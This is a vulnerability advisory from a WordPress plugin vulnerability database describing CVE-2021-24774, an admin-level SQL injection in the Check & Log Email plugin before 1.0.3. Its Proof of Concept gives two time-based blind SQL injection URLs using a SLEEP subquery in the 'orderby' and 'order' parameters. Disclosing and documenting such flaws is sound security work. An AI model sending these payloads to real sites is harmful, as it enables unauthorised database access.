WordPress Plugin Vulnerabilities

Check & Log Email < 1.0.3 - Admin+ SQL Injections

Description

The plugin does not validate and escape the "order" and "orderby" GET parameters before using them in a SQL statement when viewing logs, leading to SQL injections issues

Proof of Concept

With the 'Enable Log' settings (of the plugin) activated:
- https://example.com/wp-admin/admin.php?page=check-email-logs&orderby=sent_date+AND+(SELECT+4702+FROM (SELECT(SLEEP(5)))xwDN)&order=DESC
- https://example.com/wp-admin/admin.php?page=check-email-logs&orderby=sent_date&order=+AND+(SELECT+4702+FROM (SELECT(SLEEP(5)))xwDN)

Affects Plugins

Plugin icon
check-email
Fixed in 1.0.3

References

CVE
CVE-2021-24774

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
bl4derunner
Submitter
Anton Sarsadskikh
Verified
Yes
WPVDB ID
f80ef09a-d3e2-4d62-8532-f0ebe59ae110

Timeline

Publicly Published
2021-09-27 (about 2 years ago)
Added
2021-09-27 (about 2 years ago)
Last Updated
2022-04-14 (about 2 years ago)

Other

Published
Title
Published
2022-12-05
Title
Contest Gallery < 19.1.5 - Author+ SQL Injection
Published
2023-04-19
Title
Shortcode IMDB <= 6.0.8 - Admin+ SQLi
Published
2014-11-05
Title
WordPress Store Locator 2.3-3.11 - SQL Injection
Published
2024-03-28
Title
Media Library Folders < 8.1.8 - Authenticated (Author+) SQL Injection
Published
2014-08-01
Title
GRAND Flash Album Gallery 0.55 - lib/hitcounter.php pid Parameter SQL Injection